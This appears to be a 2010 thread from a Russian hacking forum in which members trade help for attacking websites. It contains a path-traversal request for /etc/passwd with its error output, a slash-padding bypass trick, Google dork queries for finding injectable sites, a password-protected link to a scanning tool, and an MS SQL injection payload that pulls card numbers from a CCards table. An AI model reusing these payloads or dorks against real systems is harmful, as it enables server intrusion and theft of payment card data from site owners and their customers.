ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
14.04.2010, 19:20
|
|
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547
Репутация:
93
|
|
что делать если такая ошибка
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../../../../etc/pass\0/copyright.php) is not within the allowed path(s): (/hosting/site.ru/htdocs/) in /hosting/site.ru/htdocs/includes/javascript.php on line 59
адрес такой: site.ru/modules.php?name=../../../../../../../etc/pass
site.ru/modules.php?name= ставлю ссылку на шелл - заплатка стоит
|
|
|
14.04.2010, 20:33
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от hackmon
что делать если такая ошибка
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../../../../etc/pass\0/copyright.php) is not within the allowed path(s): (/hosting/site.ru/htdocs/) in /hosting/site.ru/htdocs/includes/javascript.php on line 59
адрес такой: site.ru/modules.php?name=../../../../../../../etc/pass
site.ru/modules.php?name= ставлю ссылку на шелл - заплатка стоит
https://forum.antichat.ru/thread98525.html
|
|
|
|
14.04.2010, 20:51
|
|
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547
Репутация:
93
|
|
Сообщение от Root-access
https://forum.antichat.ru/thread98525.html
не то или я не умею
|
|
|
|
14.04.2010, 22:25
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
нужен аналог софтины Netdevilz sql ScanneR, которая сканит, а потом и парсит уязвимые урлы. Работает через гугл, такие запросы, как inurl:forum.php?id= site:.ru
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
и т.д.
|
|
|
|
14.04.2010, 22:49
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от jecka3000
нужен аналог софтины Netdevilz sql ScanneR, которая сканит, а потом и парсит уязвимые урлы. Работает через гугл, такие запросы, как inurl:forum.php?id= site:.ru
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
и т.д.
тоесть sql helper 2.7, Pangolin etc...?
|
|
|
|
14.04.2010, 23:05
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от jecka3000
нужен аналог софтины Netdevilz sql ScanneR, которая сканит, а потом и парсит уязвимые урлы. Работает через гугл, такие запросы, как inurl:forum.php?id= site:.ru
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
и т.д.
http://slil.ru/28959824
пасс: antichat
|
|
|
|
14.04.2010, 22:40
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
site.ru/modules.php?name=../../../../../../../etc/pass
Во первых - нету такого файла pass, есть файл passwd
Проблема в magic_quotes.
Пример для Unix сервера:
Код:
site.ru/modules.php?name=../../../../../../../etc/passwd//////////////////[..4095..]
4095 - это минимальное количество слешей.
Но подобный способ довольно таки редко получается провести.
|
|
|
|
14.04.2010, 22:55
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Ins3t
Во первых - нету такого файла pass, есть файл passwd
Проблема в magic_quotes.
Пример для Unix сервера:
Код:
site.ru/modules.php?name=../../../../../../../etc/passwd//////////////////[..4095..]
4095 - это минимальное количество слешей.
Но подобный способ довольно таки редко получается провести.
Сообщение от hackmon
что делать если такая ошибка
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../../../../etc/pass\0/copyright.php) is not within the allowed path(s): (/hosting/site.ru/htdocs/) in /hosting/site.ru/htdocs/includes/javascript.php on line 59
адрес такой: site.ru/modules.php?name=../../../../../../../etc/pass
site.ru/modules.php?name= ставлю ссылку на шелл - заплатка стоит
нет смысла инклюдить /etc/passwd - там же написано, что open_basedir врублен.
|
|
|
|
14.04.2010, 23:33
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Сообщение от попугай
нет смысла инклюдить /etc/passwd - там же написано, что open_basedir врублен.
Ну я показал пример самого способа ( хот и не очень удачный, так как не учел условия для выхода за пределы каталога ).
|
|
|
|
15.04.2010, 02:01
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
эмм...
вот такая проблема
MS SQL /Version:
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
когда делаю вот такой запрос:
1'+or+1=(select+top+1+CardNumber+from+CCards)--
и в ответ
Типы данных text, ntext и image недействительны в этом подопросе или в этом выражении агрегата.
hex,aes_encrypt(aes_.. не идут
Original
Microsoft OLE DB Provider for ODBC Drivers- Fehler '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Die Datentypen text, ntext und image sind in dieser Unterabfrage oder in diesem Aggregatausdruck ungültig.
/inc/session.inc, line 25
остольные columns все идут..
Последний раз редактировалось [Feldmarschall]; 23.04.2010 в 18:43..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2072979){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2073437){kind=avatar}
Похожие темы
Комбинированный вид
